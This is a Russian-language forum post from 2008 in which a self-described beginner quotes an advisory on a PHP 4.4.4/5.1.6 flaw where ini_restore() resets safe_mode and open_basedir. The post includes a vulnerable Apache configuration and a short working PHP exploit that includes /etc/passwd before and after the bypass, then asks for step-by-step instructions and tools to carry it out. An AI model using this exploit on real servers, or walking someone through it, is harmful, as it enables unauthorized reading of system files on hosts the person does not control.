Тема: PHP 5.1.6 Exploit
Показать сообщение отдельно

PHP 5.1.6 Exploit
  #1  
Старый 11.06.2008, 13:25
fasty
Познающий
Регистрация: 09.05.2008
Сообщений: 67
Провел на форуме:
690048

Репутация: 13
По умолчанию PHP 5.1.6 Exploit

Нужна помощь)
Каким образом воплотить в жизнь Exploit?

Программа:
PHP 4.4.4 и более ранние версии
PHP 5.1.6 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе.

Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера. Пример уязвимой конфигурации:
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
Эксплоит:
Код
PHP код:
<?
echo ini_get("safe_mode");
echo 
ini_get("open_basedir");
include(
"/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo 
ini_get("safe_mode");
echo 
ini_get("open_basedir");
include(
"/etc/passwd");
?>
Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ к содержимому произвольных файлов на системе.

Если можно пошагово опишите я новичёк...
С помощью какой проги или чё устанавливать чтобы это зделать) Нигде не могу найти ..

Спасибо.
 
Ответить с цитированием